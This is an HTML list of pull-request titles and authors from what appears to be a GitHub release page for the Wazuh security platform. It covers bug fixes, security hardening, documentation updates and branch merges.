<li>Validate current user in update-user endpoint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268213128" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35442" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35442/hovercard" href="https://github.com/wazuh/wazuh/pull/35442">#35442</a></li>
<li>Complete wazuh server requirements docs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4271247024" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35459" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35459/hovercard" href="https://github.com/wazuh/wazuh/pull/35459">#35459</a></li>
<li>Optimize error handling geoip locator by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4173198598" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35187" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35187/hovercard" href="https://github.com/wazuh/wazuh/pull/35187">#35187</a></li>
<li>wazuh-engine: <code>/logtest</code> endpoint cleanup temporary fields by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/matigarciadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/matigarciadev">@matigarciadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4257609555" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35420" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35420/hovercard" href="https://github.com/wazuh/wazuh/pull/35420">#35420</a></li>
<li>Add fast metrics module by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4145112904" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35142" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35142/hovercard" href="https://github.com/wazuh/wazuh/pull/35142">#35142</a></li>
<li>Bump 4.14.5 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274207880" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35465" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35465/hovercard" href="https://github.com/wazuh/wazuh/pull/35465">#35465</a></li>
<li>Update changelog for v4.14.5-rc1 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274469834" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35467" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35467/hovercard" href="https://github.com/wazuh/wazuh/pull/35467">#35467</a></li>
<li>Fix guardduty.py size in check files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4275398551" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35472" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35472/hovercard" href="https://github.com/wazuh/wazuh/pull/35472">#35472</a></li>
<li>Update uninstall procedure for Windows. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rjcausarano/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rjcausarano">@rjcausarano</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269726738" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35451" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35451/hovercard" href="https://github.com/wazuh/wazuh/pull/35451">#35451</a></li>
<li>Ms-graph - handle relationships that contain '/' by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpcerrone/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpcerrone">@jpcerrone</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264296617" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35431" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35431/hovercard" href="https://github.com/wazuh/wazuh/pull/35431">#35431</a></li>
<li>Validate IP address format in host_ip field for Windows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cborla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cborla">@cborla</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4257323072" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35418" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35418/hovercard" href="https://github.com/wazuh/wazuh/pull/35418">#35418</a></li>
<li>Avoid using keyentries counter as index by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MiguelazoDS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MiguelazoDS">@MiguelazoDS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4270559067" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35456" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35456/hovercard" href="https://github.com/wazuh/wazuh/pull/35456">#35456</a></li>
<li>Linux  test integration workflow improvements  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4104047210" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35060" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35060/hovercard" href="https://github.com/wazuh/wazuh/pull/35060">#35060</a></li>
<li>Enhancement/35084 improve it mac os by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217730438" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35289" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35289/hovercard" href="https://github.com/wazuh/wazuh/pull/35289">#35289</a></li>
<li>Resume modules before manager sync to reduce coordination pause window by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231785126" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35357" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35357/hovercard" href="https://github.com/wazuh/wazuh/pull/35357">#35357</a></li>
<li>Check first scan termination before sync start by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anromerom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anromerom">@anromerom</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4270519249" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35455" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35455/hovercard" href="https://github.com/wazuh/wazuh/pull/35455">#35455</a></li>
<li>Remove dead python code by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283426264" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35533" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35533/hovercard" href="https://github.com/wazuh/wazuh/pull/35533">#35533</a></li>
<li>Include source IP in wazuh-remoted log messages by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/20syldev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/20syldev">@20syldev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231792036" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35358" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35358/hovercard" href="https://github.com/wazuh/wazuh/pull/35358">#35358</a></li>
<li>Feed update re-scan revision by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4210897070" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35271" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35271/hovercard" href="https://github.com/wazuh/wazuh/pull/35271">#35271</a></li>
<li>Backport: Fix FIM flaky integration tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283567769" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35535" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35535/hovercard" href="https://github.com/wazuh/wazuh/pull/35535">#35535</a></li>
<li>Migrate CM store-crud resources to native JSON flow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jam300/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jam300">@jam300</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4157498935" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35172" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35172/hovercard" href="https://github.com/wazuh/wazuh/pull/35172">#35172</a></li>
<li>wazuh-engine: Engine rename archiver module to event dumper by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/matigarciadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/matigarciadev">@matigarciadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276825573" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35477" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35477/hovercard" href="https://github.com/wazuh/wazuh/pull/35477">#35477</a></li>
<li>Update inventory sync documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298327488" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35587" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35587/hovercard" href="https://github.com/wazuh/wazuh/pull/35587">#35587</a></li>
<li>Fix workflow input name: set-as-main → set_as_main in bumper workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4301149991" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35592" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35592/hovercard" href="https://github.com/wazuh/wazuh/pull/35592">#35592</a></li>
<li>Remove leftover code from deprecated Agent 0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4174518738" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35195" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35195/hovercard" href="https://github.com/wazuh/wazuh/pull/35195">#35195</a></li>
<li>Synchronize Syscollector and VD queue databases during the flush process by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rjcausarano/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rjcausarano">@rjcausarano</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4282488111" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35518" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35518/hovercard" href="https://github.com/wazuh/wazuh/pull/35518">#35518</a></li>
<li>Add manager architecture documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304896313" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35607" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35607/hovercard" href="https://github.com/wazuh/wazuh/pull/35607">#35607</a></li>
<li>Early populate metadata after handshake by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242236446" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35387" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35387/hovercard" href="https://github.com/wazuh/wazuh/pull/35387">#35387</a></li>
<li>Fix script injection vulnerabilities in CI workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpcerrone/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpcerrone">@jpcerrone</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277573631" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35480" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35480/hovercard" href="https://github.com/wazuh/wazuh/pull/35480">#35480</a></li>
<li>(4x) Fix script injection vulnerabilities in CI workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpcerrone/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpcerrone">@jpcerrone</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4302861825" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35598" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35598/hovercard" href="https://github.com/wazuh/wazuh/pull/35598">#35598</a></li>
<li>Update manager index names to sync by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283234363" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35527" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35527/hovercard" href="https://github.com/wazuh/wazuh/pull/35527">#35527</a></li>
<li>Suppress unexpected stateless events after SCA initial scan by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264427701" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35432" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35432/hovercard" href="https://github.com/wazuh/wazuh/pull/35432">#35432</a></li>
<li>Dynamic getWazuhHome by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4185052022" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35232" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35232/hovercard" href="https://github.com/wazuh/wazuh/pull/35232">#35232</a></li>
<li>Improve fast metrics interface managment and test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285231413" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35540" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35540/hovercard" href="https://github.com/wazuh/wazuh/pull/35540">#35540</a></li>
<li>Engine - Add Filter Sync by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4305822158" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35613" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35613/hovercard" href="https://github.com/wazuh/wazuh/pull/35613">#35613</a></li>
<li>Persist VD first-sync state in table_metadata by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anromerom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anromerom">@anromerom</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298795591" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35590" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35590/hovercard" href="https://github.com/wazuh/wazuh/pull/35590">#35590</a></li>
<li>Merge branch '4.14.5' into '4.14.6' by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4315471645" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35655" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35655/hovercard" href="https://github.com/wazuh/wazuh/pull/35655">#35655</a></li>
<li>Normalize stateless check fields by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnDumu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnDumu">@AnDumu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250513923" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35404" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35404/hovercard" href="https://github.com/wazuh/wazuh/pull/35404">#35404</a></li>
<li>Fix token validation race condition after revoke by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/javiersanchz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/javiersanchz">@javiersanchz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4180380748" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35218" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35218/hovercard" href="https://github.com/wazuh/wazuh/pull/35218">#35218</a></li>
<li>unify sandbox and trace into a single static parameter in policy creation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285465744" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35541" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35541/hovercard" href="https://github.com/wazuh/wazuh/pull/35541">#35541</a></li>
<li>Flush feed RocksDB memtable before marking feed ready on download completion by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312196977" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35639" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35639/hovercard" href="https://github.com/wazuh/wazuh/pull/35639">#35639</a></li>
<li>Remove unused SSL/TLS transport option from cluster by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314481440" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35648" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35648/hovercard" href="https://github.com/wazuh/wazuh/pull/35648">#35648</a></li>
<li>Fix WUA hotfix collection regression in Windows Agent v5.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318658452" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35662" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35662/hovercard" href="https://github.com/wazuh/wazuh/pull/35662">#35662</a></li>
<li>Handle stop signal during vulnerability feed download by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317318948" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35657" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35657/hovercard" href="https://github.com/wazuh/wazuh/pull/35657">#35657</a></li>
<li>Bump main branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324417355" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35699" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35699/hovercard" href="https://github.com/wazuh/wazuh/pull/35699">#35699</a></li>
<li>Revert "Merge pull request <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324417355" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35699" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35699/hovercard" href="https://github.com/wazuh/wazuh/pull/35699">#35699</a> from wazuh/enhancement/wqa35624-bum… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324443782" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35700" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35700/hovercard" href="https://github.com/wazuh/wazuh/pull/35700">#35700</a></li>
<li>Emit WCS-aligned JSON for agent-start and buffer-status events by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319706922" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35671" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35671/hovercard" href="https://github.com/wazuh/wazuh/pull/35671">#35671</a></li>
<li>Support revert bump by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318388811" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35660" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35660/hovercard" href="https://github.com/wazuh/wazuh/pull/35660">#35660</a></li>
<li>wazuh-engine: add retention policies for streamlog module by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/matigarciadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/matigarciadev">@matigarciadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292217695" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35565" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35565/hovercard" href="https://github.com/wazuh/wazuh/pull/35565">#35565</a></li>
<li>Support revert bump by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335280013" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35714" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35714/hovercard" href="https://github.com/wazuh/wazuh/pull/35714">#35714</a></li>
<li>Merge 4.14.6 into main by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325552108" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35705" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35705/hovercard" href="https://github.com/wazuh/wazuh/pull/35705">#35705</a></li>
<li>Fix rootcheck and security API IT by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338184224" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35722" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35722/hovercard" href="https://github.com/wazuh/wazuh/pull/35722">#35722</a></li>
<li>Improve Active Response Custom Script Documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338690555" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35723" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35723/hovercard" href="https://github.com/wazuh/wazuh/pull/35723">#35723</a></li>
